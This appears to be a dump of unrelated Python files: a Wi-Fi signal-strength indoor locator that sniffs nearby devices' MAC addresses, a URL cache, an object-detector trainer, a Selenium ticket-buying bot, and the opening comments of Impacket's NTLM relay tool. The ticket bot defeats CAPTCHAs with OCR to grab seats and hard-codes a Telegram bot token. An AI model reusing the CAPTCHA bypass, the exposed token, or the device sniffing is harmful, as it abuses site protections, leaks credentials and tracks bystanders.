rssi[mac][z][x][y].append(strength)
else:
arr = [[[] for _ in range(map_size)] for _ in range(map_size)]
rssi[mac].update({z:arr})
rssi[mac][z][x][y].append(strength)
else:
if mac != "48:5a:3f:45:21:0f": #Filter out my cellphone
arr = [[[] for _ in range(map_size)] for _ in range(map_size)]
new_map = {}
new_map.update({z:arr})
rssi.update({mac:new_map})
rssi[mac][z][x][y].append(strength)
for pkt in bl_packets:
content = pkt.split()
if len(content) == 2:
mac = content[0]
strength = content[1]
if mac is not None and strength is not None and strength < 0:
if mac in rssi:
if z in rssi[mac]:
rssi[mac][z][x][y].append(strength)
else:
arr = [[[] for _ in range(map_size)] for _ in range(map_size)]
rssi[mac].update({z:arr})
rssi[mac][z][x][y].append(strength)
else:
arr = [[[] for _ in range(map_size)] for _ in range(map_size)]
new_map = {}
new_map.update({z:arr})
rssi.update({mac:new_map})
rssi[mac][z][x][y].append(strength)
#Now that we have the data, calculate averages for each location
for mac in rssi:
if mac in fingerprint:
if z in fingerprint[mac]:
avg = fingerprint[mac][z]
else:
avg = [[None for _ in range(map_size)] for _ in range(map_size)]
else:
avg = [[None for _ in range(map_size)] for _ in range(map_size)]
fingerprint.update({mac:{}})
for x in range(len(rssi[mac][z])):
for y in range(len(rssi[mac][z][x])):
l = rssi[mac][z][x][y]
if len(l) > 0:
avg[x][y] = n.mean(l)
#avg[x][y] = trimmean(l, 80)
fingerprint[mac].update({z:avg})
finger_file = open(self.path + '/fingerprint.pkl', 'wb')
pickle.dump(fingerprint, finger_file)
finger_file.close()
def capture(self, map):
self.map = map
box_size = 15
print map
# create a new frame
wrap = Frame(self, bg="black")
self.hide_top()
# label showing the image
self.image = Image.open(self.path + "/" + map + ".gif")
draw = ImageDraw.Draw(self.image)
for x in range(1, 240//box_size):
draw.line((box_size*x, 0, box_size*x, 240), fill=128, width=1)
for y in range(1, 240//box_size):
draw.line((0, box_size*y, 240, box_size*y), fill=128, width=1)
self.image = ImageTk.PhotoImage(self.image)
imagelabel = Label(wrap, image=self.image)
imagelabel.grid(row=0, column=0, columnspan=2, sticky=C.W + C.E + C.N + C.S)
imagelabel.bind('<Button-1>', self.printcoords)
# when there were previous frames, hide the top one and add a back button for the new one
if len(self.framestack):
self.hide_top()
back = FlatButton(
wrap,
text='Back…',
image=self.get_icon("arrow.left"),
command= self.go_back,
)
exitbtn = FlatButton(
wrap,
text='Exit…',
image=self.get_icon("exit"),
command=self.app_exit,
)
back.set_color("#00a300") # green
exitbtn.set_color("#00a300") # green
back.grid(row=1, column=0, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
exitbtn.grid(row=1, column=1, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
#num += 1
# add the new frame to the stack and display it
self.framestack.append(wrap)
self.show_top()
self.parent.update()
def blink(self):
wrap = Frame(self, bg="green")
self.hide_top()
if len(self.framestack):
self.hide_top()
self.framestack.append(wrap)
self.show_top()
self.parent.update()
#function to be called when mouse is clicked
def printcoords(self, event):
#outputting x and y coords to console
print (event.x//box_size, event.y//box_size)
self.blink()
self.record(event.x//box_size, event.y//box_size, self.map, iface)
self.go_back()
print "DONE"
def realtime(self):
global realt
box_size = 15
# create a new frame
wrap = Frame(self, bg="black")
self.hide_top()
# label showing the image
self.image = Image.open(self.path + "/kirk-auditorium2.gif")
draw = ImageDraw.Draw(self.image)
self.image = ImageTk.PhotoImage(self.image)
imagelabel = Label(wrap, image=self.image)
imagelabel.grid(row=0, column=0, columnspan=2, sticky=C.W + C.E + C.N + C.S)
num = 0
# when there were previous frames, hide the top one and add a back button for the new one
if len(self.framestack):
self.hide_top()
back = FlatButton(
wrap,
text='Back…',
image=self.get_icon("arrow.left"),
command= self.go_back,
)
exitbtn = FlatButton(
wrap,
text='Exit…',
image=self.get_icon("exit"),
command=self.app_exit,
)
back.set_color("#00a300") # green
exitbtn.set_color("#00a300") # green
back.grid(row=1, column=0, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
exitbtn.grid(row=1, column=1, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
num += 1
realt = True
# add the new frame to the stack and display it
self.framestack.append(wrap)
self.show_top()
self.parent.update()
self.after(1,self.realtime_calculation, imagelabel)
def realtime_calculation(self, imagelabel):
global realt
global box_size
fingerprint_file = open(self.path+'/fingerprint.pkl', 'rb')
fingerprint = pickle.load(fingerprint_file)
fingerprint_file.close()
max_x = 0
max_y = 0
difference = {}
num_macs = {}
for mac in fingerprint:
for z in fingerprint[mac]:
difference.update({z:[]})
num_macs.update({z:[]})
if len(fingerprint[mac][z]) > max_x:
max_x = len(fingerprint[mac][z])
for x in range(len(fingerprint[mac][z])):
if len(fingerprint[mac][z][x]) > max_y:
max_y = len(fingerprint[mac][z][x])
while realt:
compare = {}
bl_count = 0
wifi_count = 0
#os.system("sudo hciconfig hci0 reset")
#p = Popen([self.path+"/ibeacon_scan","-b"], stdout=PIPE, stderr=PIPE, preexec_fn=os.setsid)
packets = sca.sniff(iface=iface, timeout=1)
#sys.stdout.flush()
#os.killpg(p.pid, signal.SIGTERM)
#bl_packets = p.stdout.read().split('\n')
bl_packets = [] # empty until bluetooth works
for pkt in packets:
mac, strength = parsePacket(pkt)
if mac is not None and strength is not None and strength < 0:
if mac in compare:
compare[mac].append(strength)
else:
wifi_count = wifi_count + 1
arr = []
compare.update({mac:arr})
compare[mac].append(strength)
for pkt in bl_packets:
content = pkt.split()
if len(content) == 2:
mac = str(content[0])
strength = int(content[1])
print mac, strength
if mac is not None and strength is not None and strength < 0:
if mac in compare:
compare[mac].append(strength)
else:
bl_count = bl_count + 1
arr = []
compare.update({mac:arr})
compare[mac].append(strength)
compare_avg = {}
for mac in compare:
l = compare[mac]
avg = n.mean(l)
#avg = trimmean(l, 80)
compare_avg.update({mac:avg})
guess = []
weight = []
for z in difference:
difference[z] = [[None]*max_y for _ in range(max_x)]
num_macs[z] = [[0]*max_y for _ in range(max_x)]
for mac in compare_avg:
least = None
location = []
if mac in fingerprint:
for z in fingerprint[mac]:
for x in range(len(fingerprint[mac][z])):
for y in range(len(fingerprint[mac][z][x])):
if fingerprint[mac][z][x][y] != None:
c = abs(fingerprint[mac][z][x][y] - compare_avg[mac])
num_macs[z][x][y] = num_macs[z][x][y] + 1
if difference[z][x][y] != None:
difference[z][x][y] += c
else:
difference[z][x][y] = c
final_z = ''
final_x = 0
final_y = 0
print difference
for z in difference:
for x in range(len(difference[z])):
for y in range(len(difference[z][x])):
if(final_z == ''):
final_z = z
if(difference[final_z][final_x][final_y] is None and difference[z][x][y] is not None):
final_z = z
final_x = x
final_y = y
if(difference[z][x][y] != None and difference[final_z][final_x][final_y]/num_macs[final_z][final_x][final_y] > difference[z][x][y]/num_macs[z][x][y]):
final_z = z
final_x = x
final_y = y
print(final_z, final_x, final_y)
im = Image.open(self.path + "/"+ final_z +".gif").copy()
draw = ImageDraw.Draw(im)
draw.line((box_size*x, 0, box_size*x, 240), fill=128, width=1)
draw.rectangle([final_x*box_size, final_y*box_size, final_x*box_size+box_size, final_y*box_size+box_size], fill=100)
draw.text([5,5], str(wifi_count))
draw.text([5,15], str(bl_count))
self.image = ImageTk.PhotoImage(im)
imagelabel.configure(image = self.image)
self.parent.update()
self.after(50, self.realtime_calculation, imagelabel)
def back_btn(self):
num = 0
# create a new frame
wrap = Frame(self, bg="black")
# when there were previous frames, hide the top one and add a back button for the new one
if len(self.framestack):
self.hide_top()
back = FlatButton(
wrap,
text='Back…',
image=self.get_icon("arrow.left"),
command= self.go_back,
)
def destroy_top(self):
"""
destroy the top page
:return:
"""
self.framestack[len(self.framestack) - 1].destroy()
self.framestack.pop()
def destroy_all(self):
"""
destroy all pages except the first aka. go back to start
:return:
"""
while len(self.framestack) > 1:
self.destroy_top()
def go_back(self):
"""
destroy the current frame and reshow the one below
:return:
"""
global realt
realt = False
print "go_back:", realt
self.destroy_top()
self.show_top()
def app_exit(self):
# Kills application
self.quit()
def main():
global fingerprint
root = Tk()
root.geometry("240x320")
root.wm_title('Marauders Map')
if len(sys.argv) > 1 and sys.argv[1] == 'fs':
root.wm_attributes('- fullscreen', True)
app = Marauders(root)
channel_hop.start_mon_mode('wlan0')
# Start channel hopping
iface = channel_hop.get_mon_iface()
#iface = 'wlan2'
hop = threading.Thread(target=channel_hop.channel_hop, args=[iface])
hop.daemon = True
hop.start()
os.system("sudo hciconfig hci0 reset")
#p = Popen(["hciconfig", "hci0", "down"], stdout=PIPE, stderr=PIPE, preexec_fn=os.setsid)
#p = Popen(["hciconfig", "hci0","up"], stdout=PIPE, stderr=PIPE, preexec_fn=os.setsid)
#p = Popen([app.path+"/ibeacon_scan","-b"], stdout=PIPE, preexec_fn=os.setsid)
if(os.path.isfile(app.path + '/fingerprint.pkl')):
fingerprint_file = open(app.path + '/fingerprint.pkl', 'rb')
fingerprint = pickle.load(fingerprint_file)
fingerprint_file.close()
root.mainloop()
if __name__ == '__main__':
main()
|
buffer.py
|
from databuffer.data import buffered_urls, timeout
from threading import Thread
import time
import requests
def cleaningTask():
while True:
for c, item in enumerate(buffered_urls):
if (time.time() - item["time"]) > timeout:
buffered_urls.pop(c)
time.sleep(timeout / 2)
def inquire(url, params={}, headers={}):
in_params = params
in_headers = headers
for item in buffered_urls:
if item["url"] == url:
item["request_times"][0] = item["request_times"][1]
item["request_times"][1] = time.clock()
return item["response"]
data = requests.get(url, params=in_params, headers=in_headers)
buffered_urls.append({"url": url, "time": time.time(), "request_times":[time.clock() - 1, time.clock()], "params": in_params, "headers": in_headers, "response": data})
return data
cleaning_thread = Thread(target=cleaningTask)
|
train_detector.py
|
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
import torch.distributed as dist
import torch.multiprocessing as mp
from tqdm import tqdm
from torch.multiprocessing import Process, Queue, Pool
from core.dbs import datasets
from core.utils import stdout_to_tqdm
from core.config import SystemConfig
from core.sample import data_sampling_func
from core.nnet.py_factory import NetworkFactory
def prefetch_data(system_config, db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(system_config, db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def _pin_memory(ts):
if type(ts) is list:
return [t.pin_memory() for t in ts]
return ts.pin_memory()
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [_pin_memory(x) for x in data["xs"]]
data["ys"] = [_pin_memory(y) for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
def init_parallel_jobs(system_config, dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(system_config, db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def terminate_tasks(tasks):
for task in tasks:
task.terminate()
class Detector():
def __init__(self, verbose=1):
self.system_dict = {};
self.system_dict["verbose"] = verbose;
self.system_dict["local"] = {};
self.system_dict["dataset"] = {};
self.system_dict["dataset"]["train"] = {};
self.system_dict["dataset"]["val"] = {};
self.system_dict["dataset"]["val"]["status"] = False;
self.system_dict["dataset"]["params"] = {};
self.system_dict["dataset"]["params"]["workers"] = 4;
self.system_dict["model"] = {};
self.system_dict["model"]["params"] = {};
self.system_dict["model"]["params"]["cfg_file"] = "CornerNet_Saccade";
self.system_dict["model"]["params"]["initialize"] = False;
self.system_dict["model"]["params"]["distributed"] = False;
self.system_dict["model"]["params"]["world_size"] = 0;
self.system_dict["model"]["params"]["rank"] = 0;
self.system_dict["model"]["params"]["dist_url"] = None;
self.system_dict["model"]["params"]["dist_backend"] = "nccl";
self.system_dict["model"]["params"]["use_gpu"] = True;
self.system_dict["training"] = {};
self.system_dict["training"]["params"] = {};
self.system_dict["training"]["params"]["start_iter"] = 0;
self.system_dict["training"]["params"]["gpu"] = None;
def Train_Dataset(self, root_dir, coco_dir, img_dir, set_dir, batch_size=4, use_gpu=True, num_workers=4):
self.system_dict["dataset"]["train"]["root_dir"] = root_dir;
self.system_dict["dataset"]["train"]["coco_dir"] = coco_dir;
self.system_dict["dataset"]["train"]["img_dir"] = img_dir;
self.system_dict["dataset"]["train"]["set_dir"] = set_dir;
self.system_dict["dataset"]["params"]["batch_size"] = batch_size;
self.system_dict["dataset"]["params"]["workers"] = num_workers;
self.system_dict["model"]["params"]["use_gpu"] = use_gpu;
def Val_Dataset(self, root_dir, coco_dir, img_dir, set_dir):
self.system_dict["dataset"]["val"]["status"] = True;
self.system_dict["dataset"]["val"]["root_dir"] = root_dir;
self.system_dict["dataset"]["val"]["coco_dir"] = coco_dir;
self.system_dict["dataset"]["val"]["img_dir"] = img_dir;
self.system_dict["dataset"]["val"]["set_dir"] = set_dir;
def Model(self, model_name="CornerNet_Saccade", use_distributed=False):
self.system_dict["model"]["params"]["cfg_file"] = model_name;
self.system_dict["model"]["params"]["distributed"] = use_distributed;
if(self.system_dict["model"]["params"]["distributed"]):
print("Distributed training not enabled yet");
def Hyper_Params(self, lr=0.00025, total_iterations=1000, val_interval=500):
self.system_dict["training"]["params"]["lr"] = lr;
self.system_dict["training"]["params"]["total_iterations"] = total_iterations;
self.system_dict["training"]["params"]["val_interval"] = val_interval;
def Setup(self):
distributed = self.system_dict["model"]["params"]["distributed"]
world_size = self.system_dict["model"]["params"]["world_size"]
ngpus_per_node = torch.cuda.device_count()
current_dir = os.path.dirname(os.path.realpath(__file__));
cfg_file = os.path.join(current_dir, "configs", self.system_dict["model"]["params"]["cfg_file"] + ".json")
with open(cfg_file, "r") as f:
self.system_dict["local"]["config"] = json.load(f)
self.system_dict["local"]["config"]["db"]["root_dir"] = self.system_dict["dataset"]["train"]["root_dir"];
self.system_dict["local"]["config"]["db"]["coco_dir"] = self.system_dict["dataset"]["train"]["coco_dir"];
self.system_dict["local"]["config"]["db"]["img_dir"] = self.system_dict["dataset"]["train"]["img_dir"];
self.system_dict["local"]["config"]["db"]["set_dir"] = self.system_dict["dataset"]["train"]["set_dir"];
f = open(self.system_dict["dataset"]["train"]["root_dir"] + "/" + self.system_dict["dataset"]["train"]["coco_dir"] + "/annotations/classes.txt");
lines = f.readlines();
f.close();
self.system_dict["local"]["config"]["db"]["categories"] = len(lines);
self.system_dict["local"]["config"]["system"]["batch_size"] = self.system_dict["dataset"]["params"]["batch_size"];
self.system_dict["local"]["config"]["system"]["chunk_sizes"] = [self.system_dict["dataset"]["params"]["batch_size"]];
self.system_dict["local"]["config"]["system"]["max_iter"] = self.system_dict["training"]["params"]["total_iterations"];
self.system_dict["local"]["config"]["system"]["snapshot_name"] = self.system_dict["model"]["params"]["cfg_file"]
self.system_dict["local"]["system_config"] = SystemConfig().update_config(self.system_dict["local"]["config"]["system"])
self.system_dict["local"]["training_dbs"] = [datasets[self.system_dict["local"]["system_config"].dataset](self.system_dict["local"]["config"]["db"],
sys_config=self.system_dict["local"]["system_config"]) for _ in range(self.system_dict["dataset"]["params"]["workers"])]
if(self.system_dict["dataset"]["val"]["status"]):
self.system_dict["local"]["config"]["db"]["root_dir"] = self.system_dict["dataset"]["val"]["root_dir"];
self.system_dict["local"]["config"]["db"]["coco_dir"] = self.system_dict["dataset"]["val"]["coco_dir"];
self.system_dict["local"]["config"]["db"]["img_dir"] = self.system_dict["dataset"]["val"]["img_dir"];
self.system_dict["local"]["config"]["db"]["set_dir"] = self.system_dict["dataset"]["val"]["set_dir"];
self.system_dict["local"]["validation_db"] = datasets[self.system_dict["local"]["system_config"].dataset](self.system_dict["local"]["config"]["db"],
sys_config=self.system_dict["local"]["system_config"])
if(not os.path.isdir("cache/")):
os.mkdir("cache");
if(not os.path.isdir("cache/nnet")):
os.mkdir("cache/nnet/");
if(not os.path.isdir("cache/nnet/" + self.system_dict["model"]["params"]["cfg_file"])):
os.mkdir("cache/nnet/" + self.system_dict["model"]["params"]["cfg_file"]);
model_file = "core.models.{}".format(self.system_dict["model"]["params"]["cfg_file"])
print("Loading Model - {}".format(model_file))
model_file = importlib.import_module(model_file)
self.system_dict["local"]["model"] = model_file.model(self.system_dict["local"]["config"]["db"]["categories"])
print("Model Loaded");
def Train(self, display_interval=100):
# reading arguments from command
start_iter = self.system_dict["training"]["params"]["start_iter"]
distributed = self.system_dict["model"]["params"]["distributed"]
world_size = self.system_dict["model"]["params"]["world_size"]
initialize = self.system_dict["model"]["params"]["initialize"]
gpu = None
rank = self.system_dict["model"]["params"]["rank"]
# reading arguments from json file
batch_size = self.system_dict["dataset"]["params"]["batch_size"]
learning_rate = self.system_dict["training"]["params"]["lr"]
max_iteration = self.system_dict["training"]["params"]["total_iterations"]
pretrained_model = None;
stepsize = int(self.system_dict["training"]["params"]["total_iterations"]*0.8)
snapshot = int(self.system_dict["training"]["params"]["total_iterations"]*0.5)
val_iter = self.system_dict["training"]["params"]["val_interval"]
display = display_interval
decay_rate = self.system_dict["local"]["system_config"].decay_rate
print("start_iter = {}".format(start_iter));
print("distributed = {}".format(distributed));
print("world_size = {}".format(world_size));
print("initialize = {}".format(initialize));
print("batch_size = {}".format(batch_size));
print("learning_rate = {}".format(learning_rate));
print("max_iteration = {}".format(max_iteration));
print("stepsize = {}".format(stepsize));
print("snapshot = {}".format(snapshot));
print("val_iter = {}".format(val_iter));
print("display = {}".format(display));
print("decay_rate = {}".format(decay_rate));
print("Process {}: building model...".format(rank))
self.system_dict["local"]["nnet"] = NetworkFactory(self.system_dict["local"]["system_config"],
self.system_dict["local"]["model"], distributed=distributed, gpu=gpu)
# queues storing data for training
training_queue = Queue(self.system_dict["local"]["system_config"].prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(self.system_dict["local"]["system_config"].prefetch_size)
pinned_validation_queue = queue.Queue(5)
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(self.system_dict["local"]["system_config"],
self.system_dict["local"]["training_dbs"],
training_queue, data_sampling_func, True)
if self.system_dict["dataset"]["val"]["status"]:
validation_tasks = init_parallel_jobs(self.system_dict["local"]["system_config"],
[self.system_dict["local"]["validation_db"]],
validation_queue, data_sampling_func, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("Process {}: loading from pretrained model".format(rank))
self.system_dict["local"]["nnet"].load_pretrained_params(pretrained_model)
if start_iter:
self.system_dict["local"]["nnet"].load_params(start_iter)
learning_rate /= (decay_rate ** (start_iter // stepsize))
self.system_dict["local"]["nnet"].set_lr(learning_rate)
print("Process {}: training starts from iteration {} with learning_rate {}".format(rank, start_iter + 1, learning_rate))
else:
self.system_dict["local"]["nnet"].set_lr(learning_rate)
if rank == 0:
print("training start...")
self.system_dict["local"]["nnet"].cuda()
self.system_dict["local"]["nnet"].train_mode()
if(self.system_dict["dataset"]["val"]["status"]):
old_val_loss = 100000.0;
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = self.system_dict["local"]["nnet"].train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
del training_loss
if val_iter and self.system_dict["local"]["validation_db"].db_inds.size and iteration % val_iter == 0:
self.system_dict["local"]["nnet"].eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = self.system_dict["local"]["nnet"].validate(**validation)
print("Process {}: validation loss at iteration {}: {}".format(rank, iteration, validation_loss.item()))
if(validation_loss < old_val_loss):
print("Loss Reduced from {} to {}".format(old_val_loss, validation_loss))
self.system_dict["local"]["nnet"].save_params("best");
old_val_loss = validation_loss;
else:
print("validation loss did not go below {}, current loss - {}".format(old_val_loss, validation_loss))
self.system_dict["local"]["nnet"].train_mode()
if iteration % stepsize == 0:
learning_rate /= decay_rate
self.system_dict["local"]["nnet"].set_lr(learning_rate)
self.system_dict["local"]["nnet"].save_params("final");
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
terminate_tasks(validation_tasks)
else:
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = self.system_dict["local"]["nnet"].train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
del training_loss
if(iteration % val_iter == 0):
self.system_dict["local"]["nnet"].save_params("intermediate");
if iteration % stepsize == 0:
learning_rate /= decay_rate
self.system_dict["local"]["nnet"].set_lr(learning_rate)
self.system_dict["local"]["nnet"].save_params("final");
# sending signal to kill the thread
training_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
|
Interpark + telegram.py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from tkinter import *
from datetime import datetime
import numpy, re, pyotp, sys, time, tkinter.ttk, pytesseract, tkinter.font
import cv2 as cv
from pytesseract import image_to_string
from telegram import InlineKeyboardButton, InlineKeyboardMarkup, ChatAction, Update, Bot
from telegram.ext import CommandHandler, MessageHandler, CallbackQueryHandler, Updater, Filters
import threading
dp = Tk()
main_frame = Frame(dp)
dp.geometry('500x500')
dp.title("인터파크 티켓팅 프로그램")
main_frame.pack()
driver = webdriver.Chrome("es/chromedriver")
wait = WebDriverWait(driver, 20)
url = "https://ticket.interpark.com/Gate/TPLogin.asp"
driver.get(url)
id_label = Label(main_frame, text = "아이디")
id_label.grid(row = 1, column = 0)
id_entry = Entry(main_frame)
id_entry.grid(row = 1, column = 1)
pw_label = Label(main_frame, text = "비밀번호")
pw_label.grid(row = 2, column = 0)
pw_entry = Entry(main_frame, show = '*')
pw_entry.grid(row = 2, column =1)
showcode_label = Label(main_frame, text = "공연번호")
showcode_label.grid(row=4, column = 0)
showcode_entry = Entry(main_frame)
showcode_entry.grid(row=4, column = 1)
date_label = Label(main_frame, text = "날짜")
date_label.grid(row=5, column = 0)
date_entry = Entry(main_frame)
date_entry.grid(row=5, column = 1)
round_label = Label(main_frame, text = "회차")
round_label.grid(row = 6, column = 0)
round_entry = Entry(main_frame)
round_entry.grid(row=6, column = 1)
ticket_label = Label(main_frame, text = "티켓 수")
ticket_label.grid(row = 7, column = 0)
ticket_entry = Entry(main_frame)
ticket_entry.grid(row=7, column = 1)
code_time = Entry(main_frame)
code_time.grid(row=12, column = 1)
def login_go():
driver.switch_to_frame(driver.find_element_by_tag_name('iframe'))
driver.find_element_by_name('userId').send_keys(id_entry.get())
driver.find_element_by_id('userPwd').send_keys(pw_entry.get())
driver.find_element_by_id('btn_login').click()
def link_go():
driver.get('http://poticket.interpark.com/Book/BookSession.asp?GroupCode=' + showcode_entry.get())
def seat_macro():
driver.switch_to.default_content()
seat1_frame = driver.find_element_by_name("ifrmSeat")
driver.switch_to_frame(seat1_frame)
seat2_frame = driver.find_element_by_name("ifrmSeatDetail")
driver.switch_to_frame(seat2_frame)
wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'stySeat')))
len_seatn = len(driver.find_elements_by_class_name('stySeat'))
print(len_seatn)
len_VIP = len(driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/1_90.gif"]'))
print(len_VIP)
shot = 0
VIP = driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/1_90.gif"]')
R = driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/2_90.gif"]')
S = driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/3_90.gif"]')
A = driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/4_90.gif"]')
for x in range(0 , len_seatn):
try:
VIP[x].click()
shot = shot + 1
except:
try:
R[x].click()
shot = shot + 1
except:
try:
S[x].click()
shot = shot + 1
except:
try:
A[x].click()
shot = shot + 1
except:
break
if shot == int(ticket_entry.get()):
break
def captcha():
driver.switch_to.default_content()
seat1_frame = driver.find_element_by_id("ifrmSeat")
driver.switch_to_frame(seat1_frame)
image = driver.find_element_by_id('imgCaptcha')
image = image.screenshot_as_png
with open("captcha.png", "wb") as file:
file.write(image)
image = cv.imread("captcha.png")
#Set a threshold value for the image, and save
image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
image = cv.adaptiveThreshold(image, 255, cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY, 71, 1)
kernel = cv.getStructuringElement(cv.MORPH_RECT, (3, 3))
image = cv.morphologyEx(image, cv.MORPH_OPEN, kernel, iterations=1)
cnts = cv.findContours(image, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
for c in cnts:
area = cv.contourArea(c)
if area < 50:
cv.drawContours(image, [c], -1, (0,0,0), -1)
kernel2 = numpy.array([[-1,-1,-1],[-1,9,-1],[-1,-1,-1]])
image = cv.filter2D(image,-1,kernel2)
result = 255 - image
captcha_text = image_to_string(result)
print(captcha_text)
driver.switch_to.default_content()
driver.switch_to_frame(seat1_frame)
driver.find_element_by_class_name('validationTxt').click()
driver.find_element_by_id('txtCaptcha').send_keys(captcha_text)
while 1:
if driver.find_element_by_class_name('capchaInner').is_displayed():
driver.find_element_by_class_name('refreshBtn').click()
captcha()
else:
break
def date_select():
first_frame = driver.find_element_by_id('ifrmBookStep')
driver.switch_to_frame(first_frame)
#날짜
driver.find_element_by_xpath('(//*[@id="CellPlayDate"])' + "[" + date_entry.get() + "]").click()
#회차
wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div/div[3]/div[1]/div/span/ul/li[' + round_entry.get() + ']/a'))).click()
driver.switch_to.default_content()
wait.until(EC.element_to_be_clickable((By.ID, 'LargeNextBtnImage'))).click()
#다음
try:
driver.switch_to.alert().accept()
driver.switch_to.default_content()
wait.until(EC.presence_of_all_elements_located((By.ID, 'ifrmSeat')))
except:
driver.switch_to.default_content()
wait.until(EC.presence_of_all_elements_located((By.ID, 'ifrmSeat')))
def go2():
driver.switch_to.default_content()
seat1_frame = driver.find_element_by_id("ifrmSeat")
driver.switch_to_frame(seat1_frame)
seat2_frame = driver.find_element_by_id("ifrmSeatDetail")
driver.switch_to_frame(seat2_frame)
seat_macro()
try:
driver.switch_to.alert().accept()
driver.switch_to.default_content()
driver.switch_to_frame(seat1_frame)
driver.find_element_by_id('NextStepImage').click()
driver.switch_to.alert().accept()
except:
driver.switch_to.default_content()
driver.switch_to_frame(seat1_frame)
driver.find_element_by_id('NextStepImage').click()
def go():
code_time.delete(0, END)
start_time = time.time()
try:
driver.find_element_by_class_name('closeBtn').click()
date_select()
try:
captcha()
go2()
pass
except:
go2()
pass
except:
date_select()
try:
captcha()
go2()
pass
except:
go2()
pass
finally:
code_time.insert(0 ,"%s 초" % round((time.time() - start_time),3) )
def clock_time():
clock = datetime.now().strftime('%H:%M:%S:%f')
time_label.config(text = clock)
time_label.after(1, clock_time)
BOT_TOKEN = '1289747693:AAEBosjOS2ui3ROkGrPOwmDq04JRrLPOL_U'
updater = Updater(token=BOT_TOKEN)
def build_menu(buttons, n_cols, header_buttons=None, footer_buttons=None):
menu = [buttons[i:i + n_cols] for i in range(0, len(buttons), n_cols)]
if header_buttons:
menu.insert(0, header_buttons)
if footer_buttons:
menu.append(footer_buttons)
return menu
def get_command(update, context):
show_list = []
show_list.append(InlineKeyboardButton("시작", callback_data='1'))
show_list.append(InlineKeyboardButton("직링", callback_data='2'))
show_markup = InlineKeyboardMarkup(build_menu(show_list, len(show_list) - 1))
update.message.reply_text("선택하세요.", reply_markup = show_markup)
if update.callback_data == '1':
go()
elif update.callback_data == '2':
link_go()
get_handler = CommandHandler('task', get_command)
updater.dispatcher.add_handler(get_handler)
login_button = Button(main_frame, text = "로그인", command = login_go, height = 2)
login_button.grid(row=2, column = 3)
link_button = Button(main_frame, text = "직링", command = link_go, height = 2)
link_button.grid(row=3, column = 1)
start_button = Button(main_frame, text = "시작", command = go, height = 2)
start_button.grid(row=8, column = 1)
chair_button = Button(main_frame, text = "좌석", command = go2, height = 2)
chair_button.grid(row=9, column = 1)
captcha_button = Button(main_frame, text = '캡챠', command = captcha, height = 2)
captcha_button.grid(row=10, column = 1)
time_label = Label(main_frame, height = 2)
time_label.grid(row=11, column = 1)
clock_time()
def updater2():
updater.start_polling()
updater.idle()
def mainup():
threading.Thread(target=updater2).start()
threading.Thread(dp.mainloop()).start()
mainup()
|
ntlmrelayx.py
|
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Generic NTLM Relay Module
#
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
